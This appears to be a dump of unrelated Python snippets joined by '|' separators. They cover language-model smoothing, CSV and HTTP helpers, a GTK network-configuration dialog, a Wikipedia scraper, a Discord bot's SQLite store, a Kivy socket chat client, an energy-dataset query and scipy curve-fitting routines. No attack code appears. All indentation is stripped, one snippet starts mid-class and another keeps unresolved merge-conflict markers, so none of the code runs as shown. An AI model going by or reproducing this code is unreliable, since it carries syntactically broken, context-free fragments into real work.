fullCo_oc_mat = self.fullCo_oc_mat
total_co_oc = self.total_co_oc
total_context = self.total_context
context_count = self.context_count
co_oc_count = self.co_oc_count
delta = 0.5
normalization = delta*max(context_count[word_a], 1)/(co_oc_count[word_a] + 1)
if word_a in fullCo_oc_mat[word_b]:
c_ab = max((fullCo_oc_mat[word_a][word_b] - delta), 0)/(co_oc_count[word_a] + 1)
p_b = context_count[word_b]/total_context
return c_ab + normalization*p_b
else:
p_b = max(context_count[word_b], 1)/total_context
return normalization*p_b
def kn_cng2cng(self, cng_a, cng_b):
# print(cng_a, cng_b)
cng2index_dict = self.cng2index_dict
cng2cngFullMat = self.cng2cngFullMat
t2t_context_count = self.t2t_context_count
t2t_total_contexts = self.t2t_total_contexts
t2t_total_co_oc = self.t2t_total_co_oc
t2t_co_oc_count = self.t2t_co_oc_count
try:
index_a = cng2index_dict[str(cng_a)]
index_b = cng2index_dict[str(cng_b)]
except KeyError:
return 1/440000
delta = 0.5
normalization = delta*max(t2t_context_count[index_a], 1)/(t2t_co_oc_count[index_a] + 1)
if cng2cngFullMat[index_a, index_b] > 0:
c_ab = max((cng2cngFullMat[index_a, index_b] - delta), 0)/(t2t_co_oc_count[index_a] + 1)
# print(cng_a, cng_b, c_ab)
p_b = t2t_context_count[index_b]/t2t_total_contexts
return c_ab + normalization*p_b
else:
p_b = max(t2t_context_count[index_b], 1)/t2t_total_contexts
# print(p_a, p_b)
return normalization*p_b
def kn_word2word_samecng(self, word_a, word_b):
w2w_samecng_fullmat = self.w2w_samecng_fullmat
samecng_total_co_oc = self.samecng_total_co_oc
samecng_total_context = self.samecng_total_context
samecng_context_count = self.samecng_context_count
samecng_co_oc_count = self.samecng_co_oc_count
delta = 0.5
normalization = delta*max(samecng_context_count[word_a], 1)/(samecng_co_oc_count[word_a] + 1)
if word_a in w2w_samecng_fullmat[word_b]:
c_ab = max((w2w_samecng_fullmat[word_a][word_b] - delta), 0)/(samecng_co_oc_count[word_a] + 1)
p_b = samecng_context_count[word_b]/samecng_total_context
return c_ab + normalization*p_b
else:
p_b = max(samecng_context_count[word_b], 1)/samecng_total_context
return normalization*p_b
|
import sys
import csv
def WriteCSV(fileName,data):
csvfile = file(fileName, 'wb')
writer = csv.writer(csvfile)
writer.writerows(data)
csvfile.close()
def ReadCSV(fileName):
csvfile = file(fileName, 'rb')
reader = csv.reader(csvfile)
content = [item for item in reader]
#reader.close()
return content; |
import requests
from concurrent import futures
class ApiClient:
@staticmethod
def get(endpoint):
return requests.get(endpoint)
def get_concurrently(self, endpoints):
with futures.ThreadPoolExecutor(max_workers=len(endpoints)) as executor:
results = executor.map(self.get, endpoints)
return [result.json() for result in results]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import network
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
class MainWindow(Gtk.Window):
networkInfos = None
button_dhcp = None
button_setting_ip = None
entry_ip = None
entry_mask = None
entry_gateway = None
entry_dns = None
def __init__(self):
Gtk.Window.__init__(self, title = '网络设置')
self.set_border_width(10)
self.set_position(Gtk.WindowPosition.CENTER)
self.set_resizable(False)
self.notebook = Gtk.Notebook()
self.add(self.notebook)
MainWindow.networkInfos = network.getNetworkInfo()
grid = Gtk.Grid()
grid.set_row_spacing(10)
grid.set_column_spacing(20)
self.page = Gtk.Box()
self.page.set_border_width(20)
self.notebook.append_page(self.page, Gtk.Label(MainWindow.networkInfos[0].get('id')))
self.page.add(grid)
MainWindow.button_dhcp = Gtk.RadioButton.new_with_label_from_widget(None, '自动获取IP地址')
separator1 = Gtk.HSeparator()
MainWindow.button_setting_ip = Gtk.RadioButton.new_with_mnemonic_from_widget(MainWindow.button_dhcp, '设置IP地址')
lable_ip = Gtk.Label('IP地址:')
MainWindow.entry_ip = Gtk.Entry()
MainWindow.entry_ip.set_max_length(15)
lable_mask = Gtk.Label('子网掩码:')
MainWindow.entry_mask = Gtk.Entry()
MainWindow.entry_mask.set_max_length(15)
lable_gateway = Gtk.Label('默认网关:')
MainWindow.entry_gateway = Gtk.Entry()
MainWindow.entry_gateway.set_max_length(15)
lable_dns = Gtk.Label('DNS:')
MainWindow.entry_dns = Gtk.Entry()
MainWindow.entry_dns.set_max_length(15)
separator2 = Gtk.HSeparator()
button_ok = Gtk.Button.new_with_label('确定')
button_cancel = Gtk.Button.new_with_label('取消')
grid.attach(MainWindow.button_dhcp, 0, 0, 3, 1)
grid.attach(separator1, 0, 1, 3, 1)
grid.attach(MainWindow.button_setting_ip, 0, 2, 3, 1)
grid.attach(lable_ip, 0, 3, 1, 1)
grid.attach(MainWindow.entry_ip, 1, 3, 2, 1)
grid.attach(lable_mask, 0, 4, 1, 1)
grid.attach(MainWindow.entry_mask, 1, 4, 2, 1)
grid.attach(lable_gateway, 0, 5, 1, 1)
grid.attach(MainWindow.entry_gateway, 1, 5, 2, 1)
grid.attach(lable_dns, 0, 6, 1, 1)
grid.attach(MainWindow.entry_dns, 1, 6, 2, 1)
grid.attach(separator2, 0, 7, 3, 1)
grid.attach(button_ok, 1, 8, 1, 1)
grid.attach(button_cancel, 2, 8, 1, 1)
#if MainWindow.networkInfos[0].get('method') == 'manual':
if not MainWindow.networkInfos[0].get('is_auto'):
MainWindow.button_setting_ip.set_active(True)
MainWindow.entry_ip.set_text(MainWindow.networkInfos[0].get('ip'))
MainWindow.entry_mask.set_text(MainWindow.networkInfos[0].get('subnet_mask'))
MainWindow.entry_gateway.set_text(MainWindow.networkInfos[0].get('gateway'))
MainWindow.entry_dns.set_text(MainWindow.networkInfos[0].get('dns'))
else:
MainWindow.entry_ip.set_editable(False)
MainWindow.entry_mask.set_editable(False)
MainWindow.entry_gateway.set_editable(False)
MainWindow.entry_dns.set_editable(False)
MainWindow.button_dhcp.connect("toggled", self.on_button_toggled, 'dhcp')
MainWindow.button_setting_ip.connect("toggled", self.on_button_toggled, 'setting_ip')
button_ok.connect("clicked", self.on_button_ok_clicked)
button_cancel.connect("clicked", self.on_button_cancel_clicked)
def on_button_toggled(self, button, name):
print name
if name == 'dhcp':
MainWindow.entry_ip.set_text('')
MainWindow.entry_mask.set_text('')
MainWindow.entry_gateway.set_text('')
MainWindow.entry_dns.set_text('')
MainWindow.entry_ip.set_editable(False)
MainWindow.entry_mask.set_editable(False)
MainWindow.entry_gateway.set_editable(False)
MainWindow.entry_dns.set_editable(False)
else:
#if MainWindow.networkInfos[0].get('method') == 'manual':
if not MainWindow.networkInfos[0].get('is_auto'):
MainWindow.entry_ip.set_text(MainWindow.networkInfos[0].get('ip'))
MainWindow.entry_mask.set_text(MainWindow.networkInfos[0].get('subnet_mask'))
MainWindow.entry_gateway.set_text(MainWindow.networkInfos[0].get('gateway'))
MainWindow.entry_dns.set_text(MainWindow.networkInfos[0].get('dns'))
MainWindow.entry_ip.set_editable(True)
MainWindow.entry_mask.set_editable(True)
MainWindow.entry_gateway.set_editable(True)
MainWindow.entry_dns.set_editable(True)
'''if button.get_active():
state = 'on'
else:
state = 'off'
print state'''
def on_button_ok_clicked(self, button):
if MainWindow.button_dhcp.get_active():
network.setDHCP(MainWindow.networkInfos[0].get('id'), MainWindow.networkInfos[0].get('mac'))
else:
self.ip = MainWindow.entry_ip.get_text()
self.mask = MainWindow.entry_mask.get_text()
self.gateway = MainWindow.entry_gateway.get_text()
self.dns = MainWindow.entry_dns.get_text()
#print self.ip, self.mask, self.gateway, self.dns
if self.ip and self.mask and self.gateway and self.dns and network.isIP(self.ip) and network.isIP(self.mask) and network.isIP(self.gateway) and network.isIP(self.dns):
network.setNetwork(MainWindow.networkInfos[0].get('id'), MainWindow.networkInfos[0].get('mac'), self.ip, self.mask, self.gateway, self.dns)
else:
print 'address error!'
Gtk.main_quit()
def on_button_cancel_clicked(self, button):
Gtk.main_quit()
def main():
win = MainWindow()
win.connect("destroy", Gtk.main_quit)
win.show_all()
Gtk.main()
if __name__ == '__main__':
main()
|
class Accord:
def __init__(self, notes):
self.notes = []
for note in notes:
self.notes.append(note)
def AddNote(note):
self.notes.append(note)
|
from starfish.pipeline import import_all_submodules
from ._base import Decoder
import_all_submodules(__file__, __package__)
|
# -*- coding: utf-8 -*-
"""
Created by
https://github.com/piszewc/
Scrap Wiki will scrap all Wiki tables from selected Page.
All tables are going to be saved to CSV file in current location.
"""
import requests
import pandas as pd
from bs4 import BeautifulSoup
page_html = "https://en.wikipedia.org/wiki/List_of_best-selling_singles"
page = requests.get(page_html).text
soup = BeautifulSoup(page, "lxml")
data = []
table = soup.find('table', {'class':'wikitable sortable'})
table_body = table.find('tbody')
header = table_body.find_all('th')
header = [header.text.strip() for header in header]
count_tables = soup.find_all('table')
rows = table_body.find_all('tr')
for row in rows:
cols = row.find_all('td')
cols = [ele.text.strip() for ele in cols]
data.append([ele for ele in cols if ele]) # Get rid of empty values
data[0] = header
dftable = pd.DataFrame(data[1:], columns=data[0])
site = pd.read_html(page_html)[0] |
# Runtime 28 ms, Memory Usage 14.1 MB
def toGoatLatin(self, S: str) -> str:
# declare an empty dictionary
reference = {}
# iterate through a string of vowels and
for char in "aeiouAEIOU":
reference[char] = ""
# declare 3 variables
# split the argument string by word into a list
# an empty string that will hold the appropriate number of "a"'s
# an empty list that will hold all of the goat words
split_str = S.split(" ")
a_str = ""
goat_arr = []
# initialize a helper method that takes in a word
# declare a string variable that will be the appropriate suffix
# check if the first letter is a vowel and return the approriate goat word
def goat_word(word):
goat_suffix = "ma" + a_str
if word[0] in reference:
return word + goat_suffix
else:
return word[1:] + word[0] + goat_suffix
# iterate through each word of the split word list
# increment the a_str variable by an a for each word
# append the goat word to the goat list
for s in split_str:
a_str += "a"
goat_arr.append(goat_word(s))
# join the goat list by word
return " ".join(goat_arr) |
import json
import os
import sqlite3
import traceback
DATABASE = os.getcwd()+'/databases/Data.db'
TABLE = 'PlayerInfo'
class Player:
def __init__(self, bot, ctx, user=None):
self.config = json.load(open(os.getcwd() + '/config/config.json'))
self.added_fields = []
self.removed_fields = []
self.bot = bot
self.ctx = ctx
self.ctx.author = user if user else ctx.author
try:
self.conn = sqlite3.connect(DATABASE)
except sqlite3.Error:
self.conn = None
traceback.print_exc()
self.cursor = self.conn.cursor()
self._create_table()
self._get_player_info()
def _create_table(self):
query = f"""CREATE TABLE IF NOT EXISTS {TABLE} (ID BIGINT PRIMARY KEY)"""
self.cursor.execute(query)
self.conn.commit()
def _update_table(self):
query = f"""SELECT * FROM {TABLE}"""
cursor = self.cursor.execute(query)
self.added_fields = []
self.removed_fields = [name for name in self.config['Database Info']['Delete Fields'] if name in [field[0] for field in cursor.description]]
info = self.cursor.fetchall()[0]
if info:
for column in self.config['Database Info']['All Fields']:
try:
query = f"""ALTER TABLE {TABLE} ADD COLUMN {column} {self.config['Database Info'][column]['Type']} DEFAULT {self.config['Database Info'][column]['Value']}"""
self.cursor.execute(query)
self.conn.commit()
self.added_fields.append(column)
except sqlite3.OperationalError:
pass
except Exception:
traceback.print_exc()
if self.config['Database Info']['Delete Fields']:
fields = [(field, self.config['Database Info'][field]['Type'], self.config['Database Info'][field]['Value']) for field in self.config['Database Info']['All Fields'] if field not in self.config['Database Info']['Delete Fields']]
query = f"""CREATE TABLE IF NOT EXISTS new_{TABLE} ({', '.join([f'{field[0]} {field[1]} DEFAULT {field[2]}' for field in fields])})"""
self.cursor.execute(query)
query = f"""INSERT INTO new_{TABLE} SELECT {', '.join([field[0] for field in fields])} FROM {TABLE}"""
self.cursor.execute(query)
query = f"""DROP TABLE IF EXISTS {TABLE}"""
self.cursor.execute(query)
query = f"""ALTER TABLE new_{TABLE} RENAME TO {TABLE}"""
self.cursor.execute(query)
self.conn.commit()
def _get_player_info(self):
try:
self._update_table()
except IndexError:
self._create_player()
return self._get_player_info()
query = f"SELECT * FROM {TABLE} WHERE id = ?"
self.cursor.execute(query, (self.ctx.author.id,))
info = self.cursor.fetchall()[0]
self.data = {}
for key, value in zip(self.config['Database Info']['All Fields'], info):
self.data[key] = value
def _create_player(self):
query = f"""INSERT INTO {TABLE} VALUES (?)"""
self.cursor.execute(query, (self.ctx.author.id,))
self.conn.commit()
def update_value(self, column, value):
query = f"UPDATE {TABLE} SET {column} = ? WHERE ID = ?"
self.cursor.execute(query, (value, self.ctx.author.id))
self.conn.commit()
self._get_player_info()
<<<<<<< HEAD
def purgeAll(self):
self.conn.close()
os.remove(DATABASE)
=======
>>>>>>> 6a4f225065013ebb29d3cea170160f2db5b877e5
|
# coding=utf-8
#
from ft_converter.utility import logger
from ft_converter.match import match_repeat
#
# To be completed. See small_program.match_transfer.py
#
# def refine_price(transaction_list):
# """
# Refine the price for a transaction. When a transaction's price is zero,
# i.e., absent from the FT file, its price will be calculated and saved.
# 1. For CSA and IATSA transactions, use the PRINB and FXRATE to calculate
# the price.
# 2. For CSW and IATSW transactions, match them to a CSA or IATSA transaction
# on the same day and for the same bond, then use the price of the
# CSA/IATSA transaction as the price.
# 3. For those CSW, IATSW transactions that cannot be matched, leave the
# price as zero.
# Return the list of CSW and IATSW transactions that cannot be matched.
# """
# transfer_in, transfer_out = filter_transfer_transactions(transaction_list)
# for transaction in transfer_in:
# transaction['TRADEPRC'] = abs(trade_info['PRINB']*trade_info['FXRATE']/trade_info['QTY']*100)
# matched, unmatched = match_repeat(transfer_out, transfer_in, map_transfer)
# for (transaction_out, transaction_in) in matched:
# transaction_out['TRADEPRC'] = transaction_in['TRADEPRC']
# return not_matched
# def filter_transfer_transaction(transaction_list):
# transfer_in = []
# transfer_out = []
# for transaction in transaction_list:
# if transaction['TRADEPRC'] > 0:
# logger.info('filter_transfer_transaction(): transaction {0} on {1} for bond {2} has a price {3}'.
# format(transaction['TRANTYP'], transaction['TRDDATE'],
# transaction['SCTYID_ISIN'], transaction['TRADEPRC']))
# continue
# if transaction['TRANTYP'] in ['CSA', 'IATSA']:
# transfer_in.append(transaction)
# elif transaction['TRANTYP'] in ['CSW', 'IATSW']:
# transfer_out.append(transaction)
# return transfer_in, transfer_out
# def map_transfer(transfer_out, transfer_in):
# """
# Map a transfer out transaction (CSW, IATSW) to a transfer in (CSA, IATSA).
# """
# if transfer_out['EventDate'] == transfer_in['EventDate'] \
# and transfer_out['SCTYID_ISIN'] == transfer_in['SCTYID_ISIN'] \
# and transaction_out['SCTYID_ISIN'] != '':
# return True
# return False |
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.gridlayout import GridLayout
from kivy.uix.scrollview import ScrollView
from kivy.core.window import Window
import socket
import thread
host = "192.168.0.101"
port = 9009
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
class MainGridLayout(GridLayout):
message_to_send = ""
def __init__(self, **kwargs):
super(MainGridLayout, self).__init__(**kwargs)
Window.bind(on_key_down=self.key_action)
self.ids.label1.text = str("Welcome")
thread.start_new_thread(self.handleClientMessages, ())
def key_action(self, *args):
if args[1] == 13:
self.send_message()
def Display_Message(self, message_to_send):
self.ids.label1.text = str(message_to_send)
def send_message(self):
thread.start_new_thread(self.handleSentMessages, (self.ids.entry.text,))
def handleSentMessages(self, message):
self.message_to_send = self.message_to_send + "Pawan: " + message + "\n"
self.Display_Message(self.message_to_send)
self.ids.entry.text = ""
s.send(message + "\n")
def handleClientMessages(self):
while 1:
try:
data = s.recv(1024)
print data
if not data:
break
self.message_to_send = self.message_to_send + str(data)
self.Display_Message(self.message_to_send)
except:
break
s.close()
class MainApp(App):
def build(self):
return MainGridLayout()
if __name__ == '__main__':
MainApp().run()
|
import sys
import os.path
sys.path.append(os.path.join(os.pardir,os.pardir))
import disaggregator as da
import disaggregator.PecanStreetDatasetAdapter as psda
import argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('appliance')
args = parser.parse_args()
db_url = "postgresql://USERNAME:PASSWORD@db.wiki-energy.org:5432/postgres"
psda.set_url(db_url)
schema = 'shared'
tables = [u'validated_01_2014',
u'validated_02_2014',
u'validated_03_2014',
u'validated_04_2014',
u'validated_05_2014',]
ids = []
for table in tables:
ids.append(psda.get_dataids_with_real_values(schema,table,args.appliance))
print sorted(da.utils.get_common_ids(ids))
|
def kmax(arr, k, n):
for c in range(k):
max_so_far = -float("inf")
max_here = 0
start = 0
end = 0
s = 0
for i in range(n):
max_here += arr[i]
if (max_so_far < max_here):
max_so_far = max_here
start = s
end = i
if (max_here < 0):
max_here = 0
s = i + 1
print("Maximum non-overlapping sub-array sum",
c + 1, ": ", max_so_far, ", starting index: ",
start, ", ending index: ", end, ".", sep = "")
for l in range(start, end+1):
arr[l] = -float("inf")
print()
arr1 = [4, 1, 1, -1, -3, -5, 6, 2, -6, -2]
k1 = 3
n1 = len(arr1)
kmax(arr1, k1, n1)
arr2 = [5, 1, 2, -6, 2, -1, 3, 1]
k2 = 2
n2 = len(arr2)
kmax(arr2, k2, n2)
|
'''
see also gauss_fitting.py
here:
do_linear_fit(data)
do_quadratic_fit(data)
do_cubic_fit(data)
do_exp_fit(data)
do_gauss_fit(data)
do_logistic_fit(data)
'''
from __future__ import print_function
from __future__ import division
import numpy as np
import scipy.odr
import scipy.optimize as optimize
import matplotlib.pyplot as plt
import math
def do_lower_linear_guess(data, no_points):
'''
provides a lower estimate for a linear background usefull as starting parameters for fitting complicated functions
evenly distributes data[:,0] into no_points and chooses min slope between these points
and a corresponding offset so that data - linear fit is allways positive
'''
datalength = len(data[:,0])
selected_indexes = [x*int(datalength/no_points) for x in range(no_points)]
selected_indexes.append(datalength-1)
points = data[selected_indexes,:]
# sort according to value:
switch = zip(points[:,1],points[:,0])
switch.sort()
switch = np.asarray(switch)
points = np.asarray(zip(switch[:,1],switch[:,0]))
slopes = [abs((points[0,1]-points[x+1,1])/(points[0,0]-points[x+1,0])) for x in range(no_points-1)]
slope = min(slopes)
slope = np.sign(data[-1,1] - data[0,1])*slope
offset_guess = (-points[0,0]*slope) + points[0,1]
residual = data[:,1] - linear_func([slope, offset_guess], data[:,0])
offset = offset_guess + residual.min()
# #DEBUG:
# plt.plot(data[:,0],residual,'-y')
# plt.plot(data[:,0],data[:,1],data[:,0],linear_func([slope, offset], data[:,0]))
# plt.plot(points[:,0],points[:,1],'rx')
# plt.show()
return slope, offset
def empirical_func(p, t, data):
y = p[0]*np.interp(t+p[2],data[:,0],data[:,1]) + p[1]
return y
def do_empirical_fit(data, empirical_function, verbose=False):
'''
tested
fit function is A0 * (empirical_function[t + A2]) + A1 with
returns (A0,A1,A2) = beta
'''
def fit_function(p,t):
return empirical_func(p,t,empirical_function)
_func = fit_function
Model = scipy.odr.Model(_func)
Data = scipy.odr.RealData(data[:,0], data[:,1])
startguess = [1,0,0] # no changes
Odr = scipy.odr.ODR(Data, Model, startguess , maxit = 1000000)
Odr.set_job(fit_type=2)
output = Odr.run()
#output.pprint()
beta = output.beta
betastd = output.sd_beta
residual = _func(beta, data[:,0]) - data[:,1]
if verbose:
fig, ax = plt.subplots()
# print "poly", fit_np
print("fit result amp: \n", beta[0])
print("fit result offset: \n", beta[1])
print("fit result shift: \n", beta[2])
ax.plot(data[:,0], data[:,1], "bo")
# plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
ax.plot(data[:,0], _func(beta, data[:,0]), "r--", lw = 2)
# ax.plot(data[:,0], _func([max_guess, min_guess, inflection_guess, sigma_guess ], data[:,0]), "g--", lw = 2)
plt.tight_layout()
plt.show()
return beta
def guess_period_scan(data, period_guess=None, verbose=False):
test_data = data[:,1]-data[:,1].mean()
if type(period_guess)==type(None):
scan_range = np.linspace(1,data.shape[0]/2,data.shape[0]*2)
else:
scan_range = np.asarray(period_guess)
correlation=[]
for period in scan_range:
p_correlation=0
for phase in np.linspace(0,360,72):
probe = sin_func([1,phase,period,0],data[:,0])
p_correlation=max(np.sum(probe*test_data),p_correlation)
correlation.append(p_correlation)
if verbose:
plt.plot(scan_range,correlation)
return scan_range[np.asarray(correlation).argmax()]
def sin_func(p, t):
'''
p[0] = amp
p[1] = phase in deg
p[2] = period
p[3] = offset
p[0]*np.sin(t - p[1]) + p[2]
'''
return np.abs(p[0])*np.sin((t/np.abs(p[2])+p[1]/360)*2*np.pi) + p[3]
def do_sin_fit(data, verbose = False,period_guess=None):
_func = sin_func
Model = scipy.odr.Model(_func)
Data = scipy.odr.RealData(data[:,0], data[:,1])
amp_guess = np.max(data[:,1]) - np.min(data[:,1])
phase_guess = 0.0
offset_guess = 0.5*(np.max(data[:,1]) + np.min(data[:,1]))
if type(period_guess) == type('asdf'):
if period_guess.upper() == 'SCAN':
period_guess = guess_period_scan(data,period_guess=None,verbose=verbose)
else:
period_guess = float(period_guess)
if type(period_guess)==list:
period_guess = guess_period_scan(data,period_guess=period_guess,verbose=verbose)
if type(period_guess)==np.ndarray:
period_guess = guess_period_scan(data,period_guess=period_guess,verbose=verbose)
if type(period_guess)==type(None):
period_guess=0
if verbose:
print('amp_guess = ', amp_guess)
print('phase_guess = ', phase_guess)
print('period_guess = ', period_guess)
print('offset_guess = ', offset_guess)
guess = [amp_guess, phase_guess, period_guess, offset_guess]
Odr = scipy.odr.ODR(Data, Model, guess, maxit = 10000000)
Odr.set_job(fit_type=2)
output = Odr.run()
#output.pprint()
beta = output.beta
betastd = output.sd_beta
beta[0] = np.abs(beta[0])
beta[2] = np.abs(beta[2])
if verbose :
fig, ax = plt.subplots()
# print "poly", fit_np
print("fit result amp: \n", beta[0])
print("fit result phase: \n", beta[1])
print('fit_result period = ', beta[2])
print("fit result offset: \n", beta[3])
ax.plot(data[:,0], _func(beta, data[:,0]), "r--", lw = 2)
ax.plot(data[:,0], data[:,1], "bo")
# plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
# ax.plot(data[:,0], _func([max_guess, min_guess, inflection_guess, sigma_guess ], data[:,0]), "g--", lw = 2)
plt.tight_layout()
plt.show()
return beta
def sin360period_func(p, t):
'''
p[0] = amp
p[1] = phase in deg
p[2] = offset
p[0]*np.sin(t - p[1]) + p[2]
'''
return np.abs(p[0])*np.sin((t+p[1])/360*2*np.pi) + p[2]
def do_sin360period_fit(data, verbose = False):
_func = sin360period_func
Model = scipy.odr.Model(_func)
Data = scipy.odr.RealData(data[:,0], data[:,1])
amp_guess = np.max(data[:,1]) - np.min(data[:,1])
phase_guess = 0.0
offset_guess = 0.5*(np.max(data[:,1]) + np.min(data[:,1]))
if verbose:
print('amp_guess = ', amp_guess)
print('phase_guess = ', phase_guess)
print('offset_guess = ', offset_guess)
guess = [amp_guess, phase_guess, offset_guess]
Odr = scipy.odr.ODR(Data, Model, guess, maxit = 10000000)
Odr.set_job(fit_type=2)
output = Odr.run()
#output.pprint()
beta = output.beta
betastd = output.sd_beta
beta[0] = np.abs(beta[0])
if verbose :
fig, ax = plt.subplots()
# print "poly", fit_np
print("fit result amp: \n", beta[0])
print("fit result phase: \n", beta[1])
print("fit result offset: \n", beta[2])
ax.plot(data[:,0], _func(beta, data[:,0]), "r--", lw = 2)
ax.plot(data[:,0], data[:,1], "bo")
# plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
# ax.plot(data[:,0], _func([max_guess, min_guess, inflection_guess, sigma_guess ], data[:,0]), "g--", lw = 2)
plt.tight_layout()
plt.show()
return beta
def general_logistic_func(p, t):
'''
only works for "increasing" function
p[0] = max
p[1] = min
p[2] = inflection point
p[3] = sigma (approx)
'''
return p[0]/ (1 + math.e**(-(0.5*np.pi/p[3])*(t-p[2]))) + p[1]
def do_logistic_fit(data, verbose = False):
'''
only works for "increasing" function
p[0] = max
p[1] = min
p[2] = inflection point
p[3] = sigma (approx)
'''
_func = general_logistic_func
Model = scipy.odr.Model(_func)
Data = scipy.odr.RealData(data[:,0], data[:,1])
max_guess = np.max(data[:,1])
min_guess = np.min(data[:,1])
inflection_guess = np.mean(data[:,0])
sigma_guess = 1
if verbose:
print('max_guess = ', np.max(data[:,1]))
print('min_guess = ', np.min(data[:,1]))
print('inflection_guess = ', np.mean(data[:,0]))
print('steepness_guess = ', 1)
Odr = scipy.odr.ODR(Data, Model, [max_guess, min_guess, inflection_guess, sigma_guess ], maxit = 10000000)
Odr.set_job(fit_type=2)
output = Odr.run()
#output.pprint()
beta = output.beta
betastd = output.sd_beta
if verbose :
fig, ax = plt.subplots()
# print "poly", fit_np
print("fit result max: \n", beta[0])
print("fit result min: \n", beta[1])
print("fit result inflection point: \n", beta[2])
print("fit result sigma: \n", beta[3])
ax.plot(data[:,0], data[:,1], "bo")
# plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
ax.plot(data[:,0], _func(beta, data[:,0]), "r--", lw = 2)
# ax.plot(data[:,0], _func([max_guess, min_guess, inflection_guess, sigma_guess ], data[:,0]), "g--", lw = 2)
plt.tight_layout()
plt.show()
return beta
def error_func(p,t):
# save the sign of t
sign = np.where(t >= 0, 1, -1)
t = abs(t)
# constants for approximation of error function
a1 = 0.254829592
a2 = -0.284496736
a3 = 1.421413741
a4 = -1.453152027
a5 = 1.061405429
a6 = 0.3275911
# A&S formula 7.1.26
r = 1.0/(1.0 + a6*t)
y = 1.0 - (((((a5*r + a4)*r) + a3)*r + a2)*r + a1)*r*math.exp(-t*t)
return sign*y # erf(-x) = -erf(x)
def gauss_func(p, t):
'''
p0 = a
p1 = mu
p2 = sigma
'''
return p[0]*1/(math.sqrt(2*math.pi*(p[2]**2)))*math.e**((-(t-p[1])**2/(2*p[2]**2)))
def do_gauss_fit(data, verbose = False,sigma_in_pxl=50):
Model = scipy.odr.Model(gauss_func)
Data = scipy.odr.RealData(data[:,0], data[:,1])
a_guess = np.max(data[:,1])
sigma_guess = sigma_in_pxl*np.absolute(data[0,0]-data[1,0])
mu_guess = data[:,0][np.argmax(data[:,1])]
Odr = scipy.odr.ODR(Data, Model, [a_guess,mu_guess, sigma_guess], maxit = 10000000)
Odr.set_job(fit_type=2)
output = Odr.run()
#output.pprint()
beta = output.beta
betastd = output.sd_beta
if verbose :
fig, ax = plt.subplots()
# print "poly", fit_np
print("fit result a: \n", beta[0])
print("fit result mu: \n", beta[1])
print("fit result sigma: \n", beta[2])
ax.plot(data[:,0], data[:,1], "bo")
# plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
ax.plot(data[:,0], gauss_func(beta, data[:,0]), "r--", lw = 2)
plt.tight_layout()
plt.show()
# raw_input('next')
return beta
def linear_func(p, t):
return p[0] * t + p[1]
def do_linear_fit(data, verbose = False):
Model = scipy.odr.Model(linear_func)
Data = scipy.odr.RealData(data[:,0], data[:,1])
Odr = scipy.odr.ODR(Data, Model, [-2, 1], maxit = 10000)
Odr.set_job(fit_type=2)
output = Odr.run()
#output.pprint()
beta = output.beta
betastd = output.sd_beta
if verbose :
fig, ax = plt.subplots()
# print "poly", fit_np
print("fit result [pxl/frame]: \n", beta[0])
ax.plot(data[:,0], data[:,1], "bo")
# plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
ax.plot(data[:,0], linear_func(beta, data[:,0]), "r--", lw = 2)
plt.tight_layout()
plt.show()
return beta
def quadratic_func(p, t):
return p[0]*t**2 + p[1]*t + p[2]
def do_quadratic_fit(data, verbose = False):
Model = scipy.odr.Model(quadratic_func)
Data = scipy.odr.RealData(data[:,0], data[:,1])
Odr = scipy.odr.ODR(Data, Model, [-10, -10, -2], maxit = 1000000)
Odr.set_job(fit_type=2)
output = Odr.run()
#output.pprint()
beta = output.beta
betastd = output.sd_beta
# print "poly", fit_np
if verbose:
fig, ax = plt.subplots()
print("fit result y = %s x2 + %s x + %s " % (beta[0],beta[1],beta[2]))
ax.plot(data[:,0], data[:,1], "bo")
# plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
ax.plot(data[:,0], quadratic_func(beta, data[:,0]), "r--", lw = 2)
plt.tight_layout()
plt.show()
return beta
def cubic_func(p, t):
return p[0]*t**3 + p[1]*t**2 + p[2]*t + p[3]
def do_cubic_fit(data, verbose=False):
Model = scipy.odr.Model(cubic_func)
Data = scipy.odr.RealData(data[:,0], data[:,1])
Odr = scipy.odr.ODR(Data, Model, [-10, -10, -2, 1], maxit = 1000000)
Odr.set_job(fit_type=2)
output = Odr.run()
#output.pprint()
beta = output.beta
betastd = output.sd_beta
if verbose:
fig, ax = plt.subplots()
# print "poly", fit_np
print("fit result y = %s x3 + %s x2 + %s x + %s " % (beta[0],beta[1],beta[2], beta[3]))
ax.plot(data[:,0], data[:,1], "bo")
# plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
ax.plot(data[:,0], cubic_func(beta, data[:,0]), "r--", lw = 2)
plt.tight_layout()
plt.show()
return beta
def polynomial_func(beta, t):
'''
test : works
'''
p = beta[::-1]
return np.polynomial.polynomial.polyval(t,p)
def do_polynomial_fit(data, degree, verbose = False):
'''
test works
'''
print('data in fitting:')
print('x:')
print(data[:,0])
print('y:')
print(data[:,1])
p = np.polynomial.polynomial.polyfit(data[:,0], data[:,1], degree)
beta = p[::-1]
print('result of fitting:')
print('x:')
print(data[:,0])
print('y:')
print(polynomial_func(beta, data[:,0]))
if verbose:
fig, ax = plt.subplots()
print('fount polynomial coefficients an ... a0:')
print(beta)
ax.plot(data[:,0], data[:,1], "bo")
ax.plot(data[:,0], polynomial_func(beta, data[:,0]), "r--", lw = 2)
plt.tight_layout()
plt.show()
return beta
def exp_func(p, t):
return p[0] * math.e**(t*p[1]) + p[2]
def do_exp_fit(data, verbose = False):
Model = scipy.odr.Model(exp_func)
Data = scipy.odr.RealData(data[:,0], data[:,1])
Odr = scipy.odr.ODR(Data, Model, [+10, -0.0010, 3], maxit = 1000000)
Odr.set_job(fit_type=2)
output = Odr.run()
#output.pprint()
beta = output.beta
betastd = output.sd_beta
